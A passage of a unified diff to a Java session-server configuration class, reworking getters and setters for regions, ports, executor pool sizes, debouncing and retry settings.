commonConfig.getLocalRegion().toUpperCase(); + } + } + + if (sessionServerRegion != null) { + sessionServerRegion = sessionServerRegion.toUpperCase(); + } + return sessionServerRegion; + } + + @Override + public String getClientCell(String subscriberCell) { + return this.getSessionServerRegion(); + } + + /** + * Setter method for property sessionServerRegion. + * + * @param sessionServerRegion value to be assigned to property sessionServerRegion + */ + public void setSessionServerRegion(String sessionServerRegion) { + if (sessionServerRegion != null) { + sessionServerRegion = sessionServerRegion.toUpperCase(); + } + this.sessionServerRegion = sessionServerRegion; + } + + @Override + public String getSessionServerDataCenter() { + if (commonConfig != null) { + String dataCenter = commonConfig.getLocalDataCenter(); + if (dataCenter != null && !dataCenter.isEmpty()) { + return commonConfig.getLocalDataCenter(); + } + } + + return sessionServerDataCenter; + } + + /** + * Setter method for property sessionServerDataCenter. + * + * @param sessionServerDataCenter value to be assigned to property sessionServerDataCenter + */ + public void setSessionServerDataCenter(String sessionServerDataCenter) { + this.sessionServerDataCenter = sessionServerDataCenter; + } + + /** + * Getter method for property metaNodeExchangeTimeOut. + * + * @return property value of metaNodeExchangeTimeOut + */ + @Override + public int getMetaNodeExchangeTimeoutMillis() { + return metaNodeExchangeTimeoutMillis; + } + + /** + * Setter method for property metaNodeExchangeTimeOut. + * + * @param metaNodeExchangeTimeoutMillis value to be assigned to property metaNodeExchangeTimeOut + */ + public void setMetaNodeExchangeTimeoutMillis(int metaNodeExchangeTimeoutMillis) { + this.metaNodeExchangeTimeoutMillis = metaNodeExchangeTimeoutMillis; + } + + /** + * Getter method for property dataServerPort. + * + * @return property value of dataServerPort + */ + @Override + public int getDataServerPort() { + return dataServerPort; + } + + /** + * Setter method for property dataServerPort. + * + * @param dataServerPort value to be assigned to property dataServerPort + */ + public void setDataServerPort(int dataServerPort) { + this.dataServerPort = dataServerPort; + } + + @Override + public int getDataServerNotifyPort() { + return dataServerNotifyPort; + } + + public void setDataServerNotifyPort(int dataServerNotifyPort) { + this.dataServerNotifyPort = dataServerNotifyPort; + } + + /** + * Getter method for property httpServerPort. + * + * @return property value of httpServerPort + */ + @Override + public int getHttpServerPort() { + return httpServerPort; + } + + /** + * Setter method for property httpServerPort. + * + * @param httpServerPort value to be assigned to property httpServerPort + */ + public void setHttpServerPort(int httpServerPort) { + this.httpServerPort = httpServerPort; + } + + /** + * Getter method for property stopPushSwitch. + * + * @return property value of stopPushSwitch + */ + @Override + public boolean isStopPushSwitch() { + return stopPushSwitch; + } + + /** + * Setter method for property stopPushSwitch. + * + * @param stopPushSwitch value to be assigned to property stopPushSwitch + */ + @Override + public void setStopPushSwitch(boolean stopPushSwitch) { + this.stopPushSwitch = stopPushSwitch; + } + + public String getInvalidForeverZones() { + return invalidForeverZones; + } + + /** + * Setter method for property invalidForeverZones. + * + * @param invalidForeverZones value to be assigned to property invalidForeverZones + */ + public void setInvalidForeverZones(String invalidForeverZones) { + this.invalidForeverZones = invalidForeverZones; + } + + public String getInvalidIgnoreDataidRegex() { + return invalidIgnoreDataidRegex; + } + + /** + * Setter method for property invalidIgnoreDataidRegex. + * + * @param invalidIgnoreDataidRegex value to be assigned to property invalidIgnoreDataidRegex + */ + public void setInvalidIgnoreDataidRegex(String invalidIgnoreDataidRegex) { + this.invalidIgnoreDataidRegex = invalidIgnoreDataidRegex; + } + + @Override + public int getAccessDataExecutorMinPoolSize() { + return accessDataExecutorMinPoolSize; + } + + /** + * Setter method for property accessDataExecutorMinPoolSize. + * + * @param accessDataExecutorMinPoolSize value to be assigned to property + * accessDataExecutorMinPoolSize + */ + public void setAccessDataExecutorMinPoolSize(int accessDataExecutorMinPoolSize) { + this.accessDataExecutorMinPoolSize = accessDataExecutorMinPoolSize; + } + + @Override + public int getAccessDataExecutorMaxPoolSize() { + return accessDataExecutorMaxPoolSize; + } + + /** + * Setter method for property accessDataExecutorMaxPoolSize. + * + * @param accessDataExecutorMaxPoolSize value to be assigned to property + * accessDataExecutorMaxPoolSize + */ + public void setAccessDataExecutorMaxPoolSize(int accessDataExecutorMaxPoolSize) { + this.accessDataExecutorMaxPoolSize = accessDataExecutorMaxPoolSize; + } + + @Override + public int getAccessDataExecutorQueueSize() { + return accessDataExecutorQueueSize; + } + + /** + * Setter method for property accessDataExecutorQueueSize. + * + * @param accessDataExecutorQueueSize value to be assigned to property accessDataExecutorQueueSize + */ + public void setAccessDataExecutorQueueSize(int accessDataExecutorQueueSize) { + this.accessDataExecutorQueueSize = accessDataExecutorQueueSize; + } + + @Override + public long getAccessDataExecutorKeepAliveTime() { + return accessDataExecutorKeepAliveTime; + } + + /** + * Setter method for property accessDataExecutorKeepAliveTime. + * + * @param accessDataExecutorKeepAliveTime value to be assigned to property + * accessDataExecutorKeepAliveTime + */ + public void setAccessDataExecutorKeepAliveTime(long accessDataExecutorKeepAliveTime) { + this.accessDataExecutorKeepAliveTime = accessDataExecutorKeepAliveTime; + } + + /** + * Getter method for property dataChangeExecutorMinPoolSize. + * + * @return property value of dataChangeExecutorMinPoolSize + */ + @Override + public int getDataChangeExecutorMinPoolSize() { + return dataChangeExecutorMinPoolSize; + } + + /** + * Getter method for property dataChangeExecutorMaxPoolSize. + * + * @return property value of dataChangeExecutorMaxPoolSize + */ + @Override + public int getDataChangeExecutorMaxPoolSize() { + return dataChangeExecutorMaxPoolSize; + } + + /** + * Getter method for property dataChangeExecutorQueueSize. + * + * @return property value of dataChangeExecutorQueueSize + */ + @Override + public int getDataChangeExecutorQueueSize() { + return dataChangeExecutorQueueSize; + } + + /** + * Getter method for property dataChangeExecutorKeepAliveTime. + * + * @return property value of dataChangeExecutorKeepAliveTime + */ + @Override + public long getDataChangeExecutorKeepAliveTime() { + return dataChangeExecutorKeepAliveTime; + } + + @Override + public int getDataChangeDebouncingMillis() { + return dataChangeDebouncingMillis; + } + + public void setDataChangeDebouncingMillis(int dataChangeDebouncingMillis) { + this.dataChangeDebouncingMillis = dataChangeDebouncingMillis; + } + + @Override + public int getDataChangeMaxDebouncingMillis() { + return dataChangeMaxDebouncingMillis; + } + + public void setDataChangeMaxDebouncingMillis(int dataChangeMaxDebouncingMillis) { + this.dataChangeMaxDebouncingMillis = dataChangeMaxDebouncingMillis; + } + + /** + * Setter method for property dataChangeExecutorMinPoolSize. + * + * @param dataChangeExecutorMinPoolSize value to be assigned to property + * dataChangeExecutorMinPoolSize + */ + public void setDataChangeExecutorMinPoolSize(int dataChangeExecutorMinPoolSize) { + this.dataChangeExecutorMinPoolSize = dataChangeExecutorMinPoolSize; + } + + /** + * Setter method for property dataChangeExecutorMaxPoolSize. + * + * @param dataChangeExecutorMaxPoolSize value to be assigned to property + * dataChangeExecutorMaxPoolSize + */ + public void setDataChangeExecutorMaxPoolSize(int dataChangeExecutorMaxPoolSize) { + this.dataChangeExecutorMaxPoolSize = dataChangeExecutorMaxPoolSize; + } + + /** + * Setter method for property dataChangeExecutorQueueSize. + * + * @param dataChangeExecutorQueueSize value to be assigned to property dataChangeExecutorQueueSize + */ + public void setDataChangeExecutorQueueSize(int dataChangeExecutorQueueSize) { + this.dataChangeExecutorQueueSize = dataChangeExecutorQueueSize; + } + + /** + * Setter method for property dataChangeExecutorKeepAliveTime. + * + * @param dataChangeExecutorKeepAliveTime value to be assigned to property + * dataChangeExecutorKeepAliveTime + */ + public void setDataChangeExecutorKeepAliveTime(long dataChangeExecutorKeepAliveTime) { + this.dataChangeExecutorKeepAliveTime = dataChangeExecutorKeepAliveTime; + } + + /** + * Getter method for property pushTaskExecutorMaxPoolSize. + * + * @return property value of pushTaskExecutorMaxPoolSize + */ + @Override + public int getPushTaskExecutorPoolSize() { + return pushTaskExecutorPoolSize; + } + + /** + * Getter method for property pushTaskExecutorQueueSize. + * + * @return property value of pushTaskExecutorQueueSize + */ + @Override + public int getPushTaskExecutorQueueSize() { + return pushTaskExecutorQueueSize; + } + + @Override + public int getPushDataTaskDebouncingMillis() { + return pushDataTaskDebouncingMillis; + } + + public void setPushDataTaskDebouncingMillis(int pushDataTaskDebouncingMillis) { + this.pushDataTaskDebouncingMillis = pushDataTaskDebouncingMillis; + } + + /** + * Setter method for property pushTaskExecutorPoolSize. + * + * @param pushTaskExecutorPoolSize value to be assigned to property pushTaskExecutorPoolSize + */ + public void setPushTaskExecutorPoolSize(int pushTaskExecutorPoolSize) { + this.pushTaskExecutorPoolSize = pushTaskExecutorPoolSize; + } + + /** + * Setter method for property pushTaskExecutorQueueSize. + * + * @param pushTaskExecutorQueueSize value to be assigned to property pushTaskExecutorQueueSize + */ + public void setPushTaskExecutorQueueSize(int pushTaskExecutorQueueSize) { + this.pushTaskExecutorQueueSize = pushTaskExecutorQueueSize; + } + + /** + * Getter method for property connectClientExecutorMinPoolSize. + * + * @return property value of connectClientExecutorMinPoolSize + */ + public int getConnectClientExecutorMinPoolSize() { + return connectClientExecutorMinPoolSize; + } + + /** + * Getter method for property connectClientExecutorMaxPoolSize. + * + * @return property value of connectClientExecutorMaxPoolSize + */ + public int getConnectClientExecutorMaxPoolSize() { + return connectClientExecutorMaxPoolSize; + } + + /** + * Getter method for property connectClientExecutorQueueSize. + * + * @return property value of connectClientExecutorQueueSize + */ + public int getConnectClientExecutorQueueSize() { + return connectClientExecutorQueueSize; + } + + /** + * Setter method for property connectClientExecutorMinPoolSize. + * + * @param connectClientExecutorMinPoolSize value to be assigned to property + * connectClientExecutorMinPoolSize + */ + public void setConnectClientExecutorMinPoolSize(int connectClientExecutorMinPoolSize) { + this.connectClientExecutorMinPoolSize = connectClientExecutorMinPoolSize; + } + + /** + * Setter method for property connectClientExecutorMaxPoolSize. + * + * @param connectClientExecutorMaxPoolSize value to be assigned to property + * connectClientExecutorMaxPoolSize + */ + public void setConnectClientExecutorMaxPoolSize(int connectClientExecutorMaxPoolSize) { + this.connectClientExecutorMaxPoolSize = connectClientExecutorMaxPoolSize; + } + + /** + * Setter method for property connectClientExecutorQueueSize. + * + * @param connectClientExecutorQueueSize value to be assigned to property + * connectClientExecutorQueueSize + */ + public void setConnectClientExecutorQueueSize(int connectClientExecutorQueueSize) { + this.connectClientExecutorQueueSize = connectClientExecutorQueueSize; + } + + /** + * Getter method for property dataChangeFetchTaskMaxBufferSize. + * + * @return property value of dataChangeFetchTaskMaxBufferSize + */ + @Override + public int getDataChangeFetchTaskMaxBufferSize() { + return dataChangeFetchTaskMaxBufferSize; + } + + /** + * Setter method for property dataChangeFetchTaskMaxBufferSize. + * + * @param dataChangeFetchTaskMaxBufferSize value to be assigned to property + * dataChangeFetchTaskMaxBufferSize + */ + public void setDataChangeFetchTaskMaxBufferSize(int dataChangeFetchTaskMaxBufferSize) { + this.dataChangeFetchTaskMaxBufferSize = dataChangeFetchTaskMaxBufferSize; + } + + /** + * Getter method for property dataChangeFetchTaskWorkerSize. + * + * @return property value of dataChangeFetchTaskWorkerSize + */ + @Override + public int getDataChangeFetchTaskWorkerSize() { + return dataChangeFetchTaskWorkerSize; + } + + /** + * Setter method for property dataChangeFetchTaskWorkerSize. + * + * @param dataChangeFetchTaskWorkerSize value to be assigned to property + * dataChangeFetchTaskWorkerSize + */ + public void setDataChangeFetchTaskWorkerSize(int dataChangeFetchTaskWorkerSize) { + this.dataChangeFetchTaskWorkerSize = dataChangeFetchTaskWorkerSize; + } + + /** + * Getter method for property pushDataTaskRetryFirstDelayMillis. + * + * @return property value of pushDataTaskRetryFirstDelayMillis + */ + @Override + public int getPushDataTaskRetryFirstDelayMillis() { + return pushDataTaskRetryFirstDelayMillis; + } + + /** + * Setter method for property pushDataTaskRetryFirstDelayMillis. + * + * @param pushDataTaskRetryFirstDelayMillis value to be assigned to property + * pushDataTaskRetryFirstDelayMillis + */ + public void setPushDataTaskRetryFirstDelayMillis(int pushDataTaskRetryFirstDelayMillis) { + this.pushDataTaskRetryFirstDelayMillis = pushDataTaskRetryFirstDelayMillis; + } + + /** + * Getter method for property pushDataTaskRetryIncrementDelayMillis. + * + * @return property value of pushDataTaskRetryIncrementDelayMillis + */ + @Override + public int getPushDataTaskRetryIncrementDelayMillis() { + return pushDataTaskRetryIncrementDelayMillis; + } + + /** + * Setter method for property pushDataTaskRetryIncrementDelayMillis. + * + * @param pushDataTaskRetryIncrementDelayMillis value to be assigned to property + * pushDataTaskRetryIncrementDelay + */ + public void setPushDataTaskRetryIncrementDelayMillis(int pushDataTaskRetryIncrementDelayMillis) { + this.pushDataTaskRetryIncrementDelayMillis = pushDataTaskRetryIncrementDelayMillis; + } + + /** + * Getter method for property blacklistPubDataIdRegex. + * + * @return property value of blacklistPubDataIdRegex + */ + public String getBlacklistPubDataIdRegex() { + return blacklistPubDataIdRegex; + } + + /** + * Getter method for property blacklistSubDataIdRegex. + * + * @return property value of blacklistSubDataIdRegex + */ + public String getBlacklistSubDataIdRegex() { + return blacklistSubDataIdRegex; + } + + /** + * Setter method for property blacklistPubDataIdRegex. + * + * @param blacklistPubDataIdRegex value to be assigned to property blacklistPubDataIdRegex + */ + public void setBlacklistPubDataIdRegex(String blacklistPubDataIdRegex) { + this.blacklistPubDataIdRegex = blacklistPubDataIdRegex; + } + + /** + * Setter method for property blacklistSubDataIdRegex. + * + * @param blacklistSubDataIdRegex value to be assigned to property blacklistSubDataIdRegex + */ + public void setBlacklistSubDataIdRegex(String blacklistSubDataIdRegex) { + this.blacklistSubDataIdRegex = blacklistSubDataIdRegex; + } + + /** + * Getter method for property accessLimitRate. + * + * @return property value of accessLimitRate + */ + public double getAccessLimitRate() { + return accessLimitRate; + } + + /** + * Setter method for property accessLimitRate. + * + * @param accessLimitRate value to be assigned to property accessLimitRate + */ + public void setAccessLimitRate(double accessLimitRate) { + this.accessLimitRate = accessLimitRate; + } + + /** + * Getter method for property dataClientConnNum. + * + * @return property value of dataClientConnNum + */ + @Override + public int getDataClientConnNum() { + return dataClientConnNum; + } + + /** + * Setter method for property dataClientConnNum . + * + * @param dataClientConnNum value to be assigned to property dataClientConnNum + */ + public void setDataClientConnNum(int dataClientConnNum) { + this.dataClientConnNum = dataClientConnNum; + } + + @Override + public int getDataNotifyClientConnNum() { + return dataNotifyClientConnNum; + } + + public void setDataNotifyClientConnNum(int dataNotifyClientConnNum) { + this.dataNotifyClientConnNum = dataNotifyClientConnNum; + } + + @Override + public boolean isInvalidForeverZone(String zoneId) { + if (invalidForeverZonesSet == null) { + String[] zoneNameArr = getInvalidForeverZones().split(";"); + Set set = new HashSet<>(); + for (String str : zoneNameArr) { + str = str.trim(); + if (str.length() != 0) { + set.add(str); } - - if (sessionServerRegion != null) { - sessionServerRegion = sessionServerRegion.toUpperCase(); - } - return sessionServerRegion; - } - - /** - * Setter method for property sessionServerRegion. - * - * @param sessionServerRegion value to be assigned to property sessionServerRegion - */ - public void setSessionServerRegion(String sessionServerRegion) { - if (sessionServerRegion != null) { - sessionServerRegion = sessionServerRegion.toUpperCase(); - } - this.sessionServerRegion = sessionServerRegion; - } - - @Override - public String getSessionServerDataCenter() { - if (commonConfig != null) { - String dataCenter = commonConfig.getLocalDataCenter(); - if (dataCenter != null && !dataCenter.isEmpty()) { - return commonConfig.getLocalDataCenter(); - } - } - - return sessionServerDataCenter; - } - - /** - * Setter method for property sessionServerDataCenter. - * - * @param sessionServerDataCenter value to be assigned to property sessionServerDataCenter - */ - public void setSessionServerDataCenter(String sessionServerDataCenter) { - this.sessionServerDataCenter = sessionServerDataCenter; - } - - /** - * Getter method for property metaNodeExchangeTimeOut. - * - * @return property value of metaNodeExchangeTimeOut - */ - @Override - public int getMetaNodeExchangeTimeOut() { - return metaNodeExchangeTimeOut; - } - - /** - * Setter method for property metaNodeExchangeTimeOut. - * - * @param metaNodeExchangeTimeOut value to be assigned to property metaNodeExchangeTimeOut - */ - public void setMetaNodeExchangeTimeOut(int metaNodeExchangeTimeOut) { - this.metaNodeExchangeTimeOut = metaNodeExchangeTimeOut; - } - - /** - * Getter method for property dataServerPort. - * - * @return property value of dataServerPort - */ - @Override - public int getDataServerPort() { - return dataServerPort; - } - - /** - * Setter method for property dataServerPort. - * - * @param dataServerPort value to be assigned to property dataServerPort - */ - public void setDataServerPort(int dataServerPort) { - this.dataServerPort = dataServerPort; - } - - /** - * Getter method for property httpServerPort. - * - * @return property value of httpServerPort - */ - @Override - public int getHttpServerPort() { - return httpServerPort; - } - - /** - * Setter method for property httpServerPort. - * - * @param httpServerPort value to be assigned to property httpServerPort - */ - public void setHttpServerPort(int httpServerPort) { - this.httpServerPort = httpServerPort; - } - - /** - * Getter method for property numberOfReplicas. - * - * @return property value of numberOfReplicas - */ - @Override - public int getNumberOfReplicas() { - return numberOfReplicas; - } - - /** - * Setter method for property numberOfReplicas. - * - * @param numberOfReplicas value to be assigned to property numberOfReplicas - */ - public void setNumberOfReplicas(int numberOfReplicas) { - this.numberOfReplicas = numberOfReplicas; - } - - /** - * Getter method for property schedulerGetSessionNodeTimeout. - * - * @return property value of schedulerGetSessionNodeTimeout - */ - @Override - public int getSchedulerGetSessionNodeTimeout() { - return schedulerGetSessionNodeTimeout; - } - - /** - * Setter method for property schedulerGetSessionNodeTimeout. - * - * @param schedulerGetSessionNodeTimeout value to be assigned to property schedulerGetSessionNodeTimeout - */ - public void setSchedulerGetSessionNodeTimeout(int schedulerGetSessionNodeTimeout) { - this.schedulerGetSessionNodeTimeout = schedulerGetSessionNodeTimeout; - } - - /** - * Getter method for property schedulerGetSessionNodeFirstDelay. - * - * @return property value of schedulerGetSessionNodeFirstDelay - */ - @Override - public int getSchedulerGetSessionNodeFirstDelay() { - return schedulerGetSessionNodeFirstDelay; - } - - /** - * Setter method for property schedulerGetSessionNodeFirstDelay. - * - * @param schedulerGetSessionNodeFirstDelay value to be assigned to property schedulerGetSessionNodeFirstDelay - */ - public void setSchedulerGetSessionNodeFirstDelay(int schedulerGetSessionNodeFirstDelay) { - this.schedulerGetSessionNodeFirstDelay = schedulerGetSessionNodeFirstDelay; - } - - /** - * Getter method for property schedulerGetSessionNodeExpBackOffBound. - * - * @return property value of schedulerGetSessionNodeExpBackOffBound - */ - @Override - public int getSchedulerGetSessionNodeExpBackOffBound() { - return schedulerGetSessionNodeExpBackOffBound; - } - - /** - * Setter method for property schedulerGetSessionNodeExpBackOffBound. - * - * @param schedulerGetSessionNodeExpBackOffBound value to be assigned to property schedulerGetSessionNodeExpBackOffBound - */ - public void setSchedulerGetSessionNodeExpBackOffBound(int schedulerGetSessionNodeExpBackOffBound) { - this.schedulerGetSessionNodeExpBackOffBound = schedulerGetSessionNodeExpBackOffBound; - } - - /** - * Getter method for property schedulerConnectMetaTimeout. - * - * @return property value of schedulerConnectMetaTimeout - */ - @Override - public int getSchedulerConnectMetaTimeout() { - return schedulerConnectMetaTimeout; - } - - /** - * Getter method for property schedulerConnectMetaFirstDelay. - * - * @return property value of schedulerConnectMetaFirstDelay - */ - @Override - public int getSchedulerConnectMetaFirstDelay() { - return schedulerConnectMetaFirstDelay; - } - - /** - * Getter method for property schedulerConnectMetaExpBackOffBound. - * - * @return property value of schedulerConnectMetaExpBackOffBound - */ - @Override - public int getSchedulerConnectMetaExpBackOffBound() { - return schedulerConnectMetaExpBackOffBound; - } - - /** - * Setter method for property schedulerConnectMetaTimeout. - * - * @param schedulerConnectMetaTimeout value to be assigned to property schedulerConnectMetaTimeout - */ - public void setSchedulerConnectMetaTimeout(int schedulerConnectMetaTimeout) { - this.schedulerConnectMetaTimeout = schedulerConnectMetaTimeout; - } - - /** - * Setter method for property schedulerConnectMetaFirstDelay. - * - * @param schedulerConnectMetaFirstDelay value to be assigned to property schedulerConnectMetaFirstDelay - */ - public void setSchedulerConnectMetaFirstDelay(int schedulerConnectMetaFirstDelay) { - this.schedulerConnectMetaFirstDelay = schedulerConnectMetaFirstDelay; - } - - /** - * Setter method for property schedulerConnectMetaExpBackOffBound. - * - * @param schedulerConnectMetaExpBackOffBound value to be assigned to property schedulerConnectMetaExpBackOffBound - */ - public void setSchedulerConnectMetaExpBackOffBound(int schedulerConnectMetaExpBackOffBound) { - this.schedulerConnectMetaExpBackOffBound = schedulerConnectMetaExpBackOffBound; - } - - @Override - public int getSchedulerConnectDataTimeout() { - return schedulerConnectDataTimeout; - } - - /** - * Setter method for property schedulerConnectDataTimeout. - * - * @param schedulerConnectDataTimeout value to be assigned to property schedulerConnectDataTimeout - */ - public void setSchedulerConnectDataTimeout(int schedulerConnectDataTimeout) { - this.schedulerConnectDataTimeout = schedulerConnectDataTimeout; - } - - @Override - public int getSchedulerConnectDataFirstDelay() { - return schedulerConnectDataFirstDelay; - } - - /** - * Setter method for property schedulerConnectDataFirstDelay. - * - * @param schedulerConnectDataFirstDelay value to be assigned to property schedulerConnectDataFirstDelay - */ - public void setSchedulerConnectDataFirstDelay(int schedulerConnectDataFirstDelay) { - this.schedulerConnectDataFirstDelay = schedulerConnectDataFirstDelay; - } - - @Override - public int getSchedulerConnectDataExpBackOffBound() { - return schedulerConnectDataExpBackOffBound; - } - - /** - * Setter method for property schedulerConnectDataExpBackOffBound. - * - * @param schedulerConnectDataExpBackOffBound value to be assigned to property schedulerConnectDataExpBackOffBound - */ - public void setSchedulerConnectDataExpBackOffBound(int schedulerConnectDataExpBackOffBound) { - this.schedulerConnectDataExpBackOffBound = schedulerConnectDataExpBackOffBound; - } - - /** - * Getter method for property stopPushSwitch. - * - * @return property value of stopPushSwitch - */ - @Override - public boolean isStopPushSwitch() { - return stopPushSwitch; - } - - /** - * Setter method for property stopPushSwitch. - * - * @param stopPushSwitch value to be assigned to property stopPushSwitch - */ - @Override - public void setStopPushSwitch(boolean stopPushSwitch) { - this.stopPushSwitch = stopPushSwitch; - } - - /** - * Getter method for property beginDataFetchTask. - * - * @return property value of beginDataFetchTask - */ - @Override - public boolean isBeginDataFetchTask() { - return beginDataFetchTask; - } - - /** - * Setter method for property beginDataFetchTask. - * - * @param beginDataFetchTask value to be assigned to property beginDataFetchTask - */ - @Override - public void setBeginDataFetchTask(boolean beginDataFetchTask) { - this.beginDataFetchTask = beginDataFetchTask; - } - - public String getInvalidForeverZones() { - return invalidForeverZones; - } - - /** - * Setter method for property invalidForeverZones. - * - * @param invalidForeverZones value to be assigned to property invalidForeverZones - */ - public void setInvalidForeverZones(String invalidForeverZones) { - this.invalidForeverZones = invalidForeverZones; - } - - public String getInvalidIgnoreDataidRegex() { - return invalidIgnoreDataidRegex; - } - - /** - * Setter method for property invalidIgnoreDataidRegex. - * - * @param invalidIgnoreDataidRegex value to be assigned to property invalidIgnoreDataidRegex - */ - public void setInvalidIgnoreDataidRegex(String invalidIgnoreDataidRegex) { - this.invalidIgnoreDataidRegex = invalidIgnoreDataidRegex; - } - - @Override - public int getAccessDataExecutorMinPoolSize() { - return accessDataExecutorMinPoolSize; - } - - /** - * Setter method for property accessDataExecutorMinPoolSize. - * - * @param accessDataExecutorMinPoolSize value to be assigned to property accessDataExecutorMinPoolSize - */ - public void setAccessDataExecutorMinPoolSize(int accessDataExecutorMinPoolSize) { - this.accessDataExecutorMinPoolSize = accessDataExecutorMinPoolSize; - } - - @Override - public int getAccessDataExecutorMaxPoolSize() { - return accessDataExecutorMaxPoolSize; - } - - /** - * Setter method for property accessDataExecutorMaxPoolSize. - * - * @param accessDataExecutorMaxPoolSize value to be assigned to property accessDataExecutorMaxPoolSize - */ - public void setAccessDataExecutorMaxPoolSize(int accessDataExecutorMaxPoolSize) { - this.accessDataExecutorMaxPoolSize = accessDataExecutorMaxPoolSize; - } - - @Override - public int getAccessDataExecutorQueueSize() { - return accessDataExecutorQueueSize; - } - - /** - * Setter method for property accessDataExecutorQueueSize. - * - * @param accessDataExecutorQueueSize value to be assigned to property accessDataExecutorQueueSize - */ - public void setAccessDataExecutorQueueSize(int accessDataExecutorQueueSize) { - this.accessDataExecutorQueueSize = accessDataExecutorQueueSize; - } - - @Override - public long getAccessDataExecutorKeepAliveTime() { - return accessDataExecutorKeepAliveTime; - } - - /** - * Setter method for property accessDataExecutorKeepAliveTime. - * - * @param accessDataExecutorKeepAliveTime value to be assigned to property accessDataExecutorKeepAliveTime - */ - public void setAccessDataExecutorKeepAliveTime(long accessDataExecutorKeepAliveTime) { - this.accessDataExecutorKeepAliveTime = accessDataExecutorKeepAliveTime; - } - - public String getPushEmptyDataDataIdPrefixes() { - return pushEmptyDataDataIdPrefixes; - } - - /** - * Getter method for property dataChangeExecutorMinPoolSize. - * - * @return property value of dataChangeExecutorMinPoolSize - */ - @Override - public int getDataChangeExecutorMinPoolSize() { - return dataChangeExecutorMinPoolSize; - } - - /** - * Getter method for property dataChangeExecutorMaxPoolSize. - * - * @return property value of dataChangeExecutorMaxPoolSize - */ - @Override - public int getDataChangeExecutorMaxPoolSize() { - return dataChangeExecutorMaxPoolSize; - } - - /** - * Getter method for property dataChangeExecutorQueueSize. - * - * @return property value of dataChangeExecutorQueueSize - */ - @Override - public int getDataChangeExecutorQueueSize() { - return dataChangeExecutorQueueSize; - } - - /** - * Getter method for property dataChangeExecutorKeepAliveTime. - * - * @return property value of dataChangeExecutorKeepAliveTime - */ - @Override - public long getDataChangeExecutorKeepAliveTime() { - return dataChangeExecutorKeepAliveTime; - } - - /** - * Setter method for property dataChangeExecutorMinPoolSize. - * - * @param dataChangeExecutorMinPoolSize value to be assigned to property dataChangeExecutorMinPoolSize - */ - public void setDataChangeExecutorMinPoolSize(int dataChangeExecutorMinPoolSize) { - this.dataChangeExecutorMinPoolSize = dataChangeExecutorMinPoolSize; - } - - /** - * Setter method for property dataChangeExecutorMaxPoolSize. - * - * @param dataChangeExecutorMaxPoolSize value to be assigned to property dataChangeExecutorMaxPoolSize - */ - public void setDataChangeExecutorMaxPoolSize(int dataChangeExecutorMaxPoolSize) { - this.dataChangeExecutorMaxPoolSize = dataChangeExecutorMaxPoolSize; - } - - /** - * Setter method for property dataChangeExecutorQueueSize. - * - * @param dataChangeExecutorQueueSize value to be assigned to property dataChangeExecutorQueueSize - */ - public void setDataChangeExecutorQueueSize(int dataChangeExecutorQueueSize) { - this.dataChangeExecutorQueueSize = dataChangeExecutorQueueSize; - } - - /** - * Setter method for property dataChangeExecutorKeepAliveTime. - * - * @param dataChangeExecutorKeepAliveTime value to be assigned to property dataChangeExecutorKeepAliveTime - */ - public void setDataChangeExecutorKeepAliveTime(long dataChangeExecutorKeepAliveTime) { - this.dataChangeExecutorKeepAliveTime = dataChangeExecutorKeepAliveTime; - } - - /** - * Setter method for property pushEmptyDataDataIdPrefixes. - * - * @param pushEmptyDataDataIdPrefixes value to be assigned to property pushEmptyDataDataIdPrefixes - */ - public void setPushEmptyDataDataIdPrefixes(String pushEmptyDataDataIdPrefixes) { - this.pushEmptyDataDataIdPrefixes = pushEmptyDataDataIdPrefixes; - } - - /** - * Getter method for property pushTaskExecutorMinPoolSize. - * - * @return property value of pushTaskExecutorMinPoolSize - */ - @Override - public int getPushTaskExecutorMinPoolSize() { - return pushTaskExecutorMinPoolSize; - } - - /** - * Getter method for property pushTaskExecutorMaxPoolSize. - * - * @return property value of pushTaskExecutorMaxPoolSize - */ - @Override - public int getPushTaskExecutorMaxPoolSize() { - return pushTaskExecutorMaxPoolSize; - } - - /** - * Getter method for property pushTaskExecutorQueueSize. - * - * @return property value of pushTaskExecutorQueueSize - */ - @Override - public int getPushTaskExecutorQueueSize() { - return pushTaskExecutorQueueSize; - } - - /** - * Getter method for property pushTaskExecutorKeepAliveTime. - * - * @return property value of pushTaskExecutorKeepAliveTime - */ - @Override - public long getPushTaskExecutorKeepAliveTime() { - return pushTaskExecutorKeepAliveTime; - } - - /** - * Setter method for property pushTaskExecutorMinPoolSize. - * - * @param pushTaskExecutorMinPoolSize value to be assigned to property pushTaskExecutorMinPoolSize - */ - public void setPushTaskExecutorMinPoolSize(int pushTaskExecutorMinPoolSize) { - this.pushTaskExecutorMinPoolSize = pushTaskExecutorMinPoolSize; - } - - /** - * Setter method for property pushTaskExecutorMaxPoolSize. - * - * @param pushTaskExecutorMaxPoolSize value to be assigned to property pushTaskExecutorMaxPoolSize - */ - public void setPushTaskExecutorMaxPoolSize(int pushTaskExecutorMaxPoolSize) { - this.pushTaskExecutorMaxPoolSize = pushTaskExecutorMaxPoolSize; - } - - /** - * Setter method for property pushTaskExecutorQueueSize. - * - * @param pushTaskExecutorQueueSize value to be assigned to property pushTaskExecutorQueueSize - */ - public void setPushTaskExecutorQueueSize(int pushTaskExecutorQueueSize) { - this.pushTaskExecutorQueueSize = pushTaskExecutorQueueSize; - } - - /** - * Setter method for property pushTaskExecutorKeepAliveTime. - * - * @param pushTaskExecutorKeepAliveTime value to be assigned to property pushTaskExecutorKeepAliveTime - */ - public void setPushTaskExecutorKeepAliveTime(long pushTaskExecutorKeepAliveTime) { - this.pushTaskExecutorKeepAliveTime = pushTaskExecutorKeepAliveTime; - } - - public Set getPushEmptyDataDataIdPrefixesSet() { - if (pushEmptyDataDataIdPrefixesSet == null || pushEmptyDataDataIdPrefixesSet.isEmpty()) { - Set s = new HashSet<>(); - String[] arr = pushEmptyDataDataIdPrefixes.split(";"); - for (String str : arr) { - if (str.trim().length() > 0) { - s.add(str); - } - } - pushEmptyDataDataIdPrefixesSet = Collections.unmodifiableSet(s); - } - return pushEmptyDataDataIdPrefixesSet; - } - - /** - * Setter method for property pushEmptyDataDataIdPrefixesSet. - * - * @param pushEmptyDataDataIdPrefixesSet value to be assigned to property pushEmptyDataDataIdPrefixesSet - */ - public void setPushEmptyDataDataIdPrefixesSet(Set pushEmptyDataDataIdPrefixesSet) { - this.pushEmptyDataDataIdPrefixesSet = pushEmptyDataDataIdPrefixesSet; - } - - /** - * Getter method for property defaultSessionExecutorMinPoolSize. - * - * @return property value of defaultSessionExecutorMinPoolSize - */ - public int getDefaultSessionExecutorMinPoolSize() { - return defaultSessionExecutorMinPoolSize; - } - - /** - * Getter method for property 